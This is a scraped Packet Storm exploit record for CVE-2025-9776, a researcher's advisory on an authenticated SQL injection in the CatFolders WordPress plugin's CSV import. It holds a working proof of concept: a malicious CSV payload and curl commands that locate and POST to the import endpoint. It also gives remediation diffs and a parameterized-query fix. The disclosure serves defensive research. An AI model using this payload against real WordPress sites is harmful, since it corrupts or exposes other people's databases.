{“lastseen”:”2026-05-08T18:03:47″,”description”:”WordPress CatFolders plugin versions 2.5.2 and below suffer from a remote SQL injection vulnerability…”,”published”:”2026-05-08T00:00:00″,”modified”:”2026-05-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress CatFolders 2.5.2 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:220601″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-9776″],”sourceData”:”# CVE-2025-9776: Authenticated SQL Injection in CatFolders WordPress Plugin\\n \\n [](https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-9776)\\n [](https:\/\/nvd.nist.gov\/vuln-metrics\/cvss\/v3-calculator)\\n [](https:\/\/wordpress.org\/plugins\/catfolders\/)\\n [](https:\/\/cwe.mitre.org\/data\/definitions\/89.html)\\n [](https:\/\/www.wordfence.com\/)\\n \\n \\u003e **Keywords:** CVE-2025-9776, CatFolders WordPress vulnerability, SQL injection WordPress, authenticated SQL injection, WordPress security, CSV import vulnerability, WordPress plugin exploit, CWE-89, WordPress database attack, media library vulnerability, WordPress CVE 2025\\n \\n ## Table of Contents\\n \\n – [Overview](#overview)\\n – [Vulnerability Details](#vulnerability-details)\\n – [Technical Analysis](#technical-details)\\n – [Proof of Concept](#proof-of-concept)\\n – [Remediation Guide](#remediation)\\n – [CVSS Metrics](#cvss-v31-metrics)\\n – [References](#references)\\n – [Security Contact](#contact)\\n \\n ## Overview\\n \\n An authenticated SQL Injection vulnerability was discovered in the CatFolders WordPress plugin that allows Author-level users to manipulate database queries through malicious CSV imports.\\n \\n **Discovered by:** Kai Aizen (SnailSploit) \\n **Published:** 2025 \\n **CVSS Score:** 6.5 (Medium) \\n **CWE:** CWE-89 – SQL Injection\\n \\n ## Vulnerability Details\\n \\n ### Description\\n \\n CatFolders \u2013 Tame Your WordPress Media Library by Category contains an authenticated SQL Injection vulnerability in the CSV import functionality. The `attachments` column from a user-supplied CSV is split into a list and passed directly to `FolderModel::set_attachments()` which concatenates those values into raw SQL `IN (…)` clauses without proper sanitization or parameterization.\\n \\n ### Impact\\n \\n This vulnerability allows authenticated attackers with Author-level privileges to:\\n – Execute arbitrary SQL queries\\n – Mass deletion or manipulation of folder-attachment mappings\\n – Potential data exposure depending on payload and database structure\\n – Compromise database integrity and availability\\n \\n ### Affected Versions\\n \\n – **Vulnerable:** All versions \u2264 2.5.2\\n – **Patched:** Version 2.5.3 and above (verify with vendor)\\n \\n ### CVSS v3.1 Metrics\\n \\n “`\\n CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:N\/I:L\/A:L\\n “`\\n \\n | Metric | Value |\\n |——–|——-|\\n | Attack Vector | Network (AV:N) |\\n | Attack Complexity | Low (AC:L) |\\n | Privileges Required | Low (PR:L) – Author+ |\\n | User Interaction | None (UI:N) |\\n | Scope | Unchanged (S:U) |\\n | Confidentiality | None (C:N) |\\n | Integrity | Low (I:L) |\\n | Availability | Low (A:L) |\\n \\n ## Technical Details\\n \\n ### Vulnerable Code Path\\n \\n The vulnerability exists in the CSV import workflow:\\n \\n **File:** `includes\/Rest\/Controllers\/ImportController.php`\\n \\n 1. The `import_csv` method parses uploaded CSV without per-field sanitization\\n 2. `restore_folders()` calls:\\n “`php\\n FolderModel::set_attachments( \\n $new_folder[‘id’], \\n explode(‘,’, $folder[‘attachments’]), \\n false \\n );\\n “`\\n \\n **File:** `includes\/Models\/FolderModel.php`\\n \\n 3. `set_attachments()` builds raw SQL using string concatenation:\\n “`php\\n ‘raw’ =\\u003e ‘post_id IN (‘ . $attachmentIds . ‘)’\\n “`\\n \\n 4. Each element is **not** cast to integer nor parameterized, allowing SQL injection\\n \\n ### Attack Vector\\n \\n An attacker with Author-level privileges (`upload_files` capability) can inject malicious SQL through the CSV import endpoint:\\n \\n **Malicious CSV payload:**\\n “`csv\\n id,name,attachments\\n 1,Test Folder,\\”1) OR 1=1–\\”\\n “`\\n \\n **Resulting vulnerable query:**\\n “`sql\\n SELECT folder_id FROM wp_catf_folder_posts \\n WHERE post_id IN (1) OR 1=1–)\\n “`\\n \\n This breaks out of the `IN(…)` clause and alters query semantics, potentially affecting all rows.\\n \\n ### Prerequisites\\n \\n – Author-level account (or higher) on target WordPress site\\n – CatFolders plugin installed and active\\n – Access to the REST API import endpoint\\n \\n ## Proof of Concept\\n \\n ### Step 1: Discover the REST Namespace\\n \\n “`bash\\n curl -s https:\/\/target.site\/wp-json | jq -r ‘.routes | keys[]’ | grep ‘\/import-csv$’\\n “`\\n \\n Typical result: `\/catf\/v1\/import-csv`\\n \\n ### Step 2: Prepare Malicious CSV\\n \\n Create a file named `catf_inject.csv`:\\n \\n “`csv\\n id,name,attachments\\n 1,Malicious Folder,\\”1) OR 1=1–\\”\\n “`\\n \\n ### Step 3: Execute the Attack\\n \\n “`bash\\n NS=\\”\/catf\/v1\\” # Replace with discovered namespace\\n \\n curl -i \\\\\\n -u ‘author_user:APPLICATION_PASSWORD’ \\\\\\n -F \\”file=@catf_inject.csv;type=text\/csv\\” \\\\\\n -X POST \\”https:\/\/target.site\/wp-json${NS}\/import-csv\\”\\n “`\\n \\n **Expected response:**\\n “`json\\n { \\”success\\”: true }\\n “`\\n \\n ### Impact Demonstration\\n \\n The server constructs and executes:\\n “`sql\\n SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (1) OR 1=1–)\\n “`\\n \\n This may perform broader DELETE\/INSERT operations than intended, often wiping folder-attachment relationships across the entire database.\\n \\n ### Safe Testing Environment\\n \\n Run the standalone SQLite simulation to observe the vulnerability safely:\\n \\n “`bash\\n python3 poc\/catfolders_sql_poc.py\\n “`\\n \\n This prints the vulnerable query and demonstrates how a malicious token returns all rows, while a parameterized version properly rejects it.\\n \\n ## Remediation\\n \\n ### For Site Administrators\\n \\n **Immediate Action Required:**\\n \\n 1. Update CatFolders to version **2.5.3** or later\\n 2. Review user accounts with Author-level or higher privileges\\n 3. Audit database logs for suspicious queries between affected dates\\n 4. Check folder-attachment mappings for unexpected modifications\\n \\n ### For Developers\\n \\n **Two minimal hardening steps:**\\n \\n #### 1. Sanitize IDs Before Calling the Model\\n \\n “`diff\\n – FolderModel::set_attachments( $new_folder[‘id’], explode(‘,’, $folder[‘attachments’]), false );\\n + $ids = array_filter( array_map( ‘intval’, explode(‘,’, $folder[‘attachments’]) ) );\\n + if ( ! empty( $ids ) ) {\\n + FolderModel::set_attachments( (int) $new_folder[‘id’], $ids, false );\\n + }\\n “`\\n \\n #### 2. Enforce Integers Inside `set_attachments()`\\n \\n “`diff\\n $imgIds = apply_filters( ‘catf_attachment_ids_to_folder’, $imgIds );\\n + $imgIds = array_values( array_filter( array_map( ‘intval’, (array) $imgIds ) ) );\\n “`\\n \\n ### Stronger Recommendation\\n \\n Replace **all** raw SQL concatenation with parameterized queries using WordPress’s `$wpdb-\\u003eprepare()`:\\n \\n “`php\\n $placeholders = implode(‘,’, array_fill(0, count($imgIds), ‘%d’));\\n $query = $wpdb-\\u003eprepare(\\n \\”SELECT folder_id FROM {$wpdb-\\u003eprefix}catf_folder_posts WHERE post_id IN ($placeholders)\\”,\\n …$imgIds\\n );\\n “`\\n \\n **Additionally:**\\n – Validate all CSV fields strictly before processing\\n – Implement input type validation at the API layer\\n – Add rate limiting to the import endpoint\\n – Log all import operations for audit trails\\n \\n ### Patch File\\n \\n A complete patch is available in `patch\/catfolders_fix.patch`\\n \\n ## Repository Structure\\n \\n “`\\n CVE-2025-9776\/\\n \u251c\u2500\u2500 README.md # This file\\n \u251c\u2500\u2500 poc\/\\n \u2502 \u251c\u2500\u2500 catf_inject.csv # Malicious CSV payload\\n \u2502 \u2514\u2500\u2500 catfolders_sql_poc.py # Safe SQLite simulation\\n \u2514\u2500\u2500 patch\/\\n \u2514\u2500\u2500 catfolders_fix.patch # Recommended fixes\\n “`\\n \\n ## Timeline\\n \\n – **Discovery Date:** 2025\\n – **Vendor Notification:** Coordinated disclosure via Wordfence\\n – **Public Disclosure:** 2025\\n – **Patch Available:** Version 2.5.3\\n \\n ## References\\n \\n – [MITRE CVE Entry](https:\/\/www.cve.org\/CVERecord?id=CVE-2025-9776)\\n – [Wordfence Intelligence Advisory](https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/catfolders\/catfolders-tame-your-wordpress-media-library-by-category-252-authenticated-author-sql-injection-via-csv-import)\\n – [WordPress Plugin Directory](https:\/\/wordpress.org\/plugins\/catfolders\/)\\n – [SnailSploit Research](https:\/\/snailsploit.com)\\n \\n ## Credits\\n \\n **Researcher:** Kai Aizen (SnailSploit)\\n \\n **Disclosure Process:** Coordinated through Wordfence Bug Bounty Program\\n \\n ## Ethical Considerations\\n \\n **\u26a0\ufe0f IMPORTANT DISCLAIMER**\\n \\n This Proof of Concept is provided **exclusively for defensive research and educational purposes**.\\n \\n ### Usage Guidelines\\n \\n – \u2705 **DO:** Test on your own systems or with explicit written authorization\\n – \u2705 **DO:** Use for security training and awareness\\n – \u2705 **DO:** Implement the fixes in your own code\\n – \u274c **DO NOT:** Test against systems without permission\\n – \u274c **DO NOT:** Use for malicious purposes\\n – \u274c **DO NOT:** Exploit in production environments\\n \\n ### Legal Notice\\n \\n Unauthorized access to computer systems is illegal under laws including:\\n – Computer Fraud and Abuse Act (CFAA) – United States\\n – Computer Misuse Act – United Kingdom \\n – Similar legislation in other jurisdictions\\n \\n **Use at your own risk. The researchers and SnailSploit assume no liability for misuse of this information.**\\n \\n ## Contact\\n \\n For questions or additional information about this vulnerability:\\n – **Email:** kai@owasp.com\\n – **LinkedIn:** [linkedin.com\/in\/kaiaizen](https:\/\/linkedin.com\/in\/kaiaizen)\\n – **Website:** [snailsploit.com](https:\/\/snailsploit.com)\\n – **Organization:** SnailSploit Security Research\\n \\n —\\n \\n **Stay secure and keep your WordPress installations updated!**\\n \\n *Last updated: October 13, 2025*\\n \\n \\u003c!– snailsploit-backlink:start –\\u003e\\n \\n —\\n \\n ## \ud83d\udcda Documentation \\u0026 Author\\n \\n This project’s full writeup, methodology, and related research lives at:\\n \\n **[https:\/\/snailsploit.com\/security-research\/cves\/cve-2025-9776\/](https:\/\/snailsploit.com\/security-research\/cves\/cve-2025-9776\/)**\\n \\n Created by **Kai Aizen** \u2014 independent offensive security researcher.\\n \\n [snailsploit.com](https:\/\/snailsploit.com) \u00b7 [Research](https:\/\/snailsploit.com\/research) \u00b7 [Frameworks](https:\/\/snailsploit.com\/frameworks) \u00b7 [GitHub](https:\/\/github.com\/SnailSploit) \u00b7 [LinkedIn](https:\/\/linkedin.com\/in\/kaiaizen) \u00b7 [ResearchGate](https:\/\/www.researchgate.net\/profile\/Kai-Aizen-2) \u00b7 [X\/Twitter](https:\/\/x.com\/SnailSploit)\\n \\n \\u003e *Same attack. Different substrate.*\\n \\n \\u003c!– snailsploit-backlink:end –\\u003e”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220601″,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220601\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-08T18:03:47″,”description”:”WordPress CatFolders plugin versions 2.5.2 and below suffer from a remote SQL injection vulnerability…”,”published”:”2026-05-08T00:00:00″,”modified”:”2026-05-08T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress CatFolders 2.5.2 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:220601″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-9776″],”sourceData”:”# CVE-2025-9776: Authenticated SQL Injection in CatFolders…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-52565","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n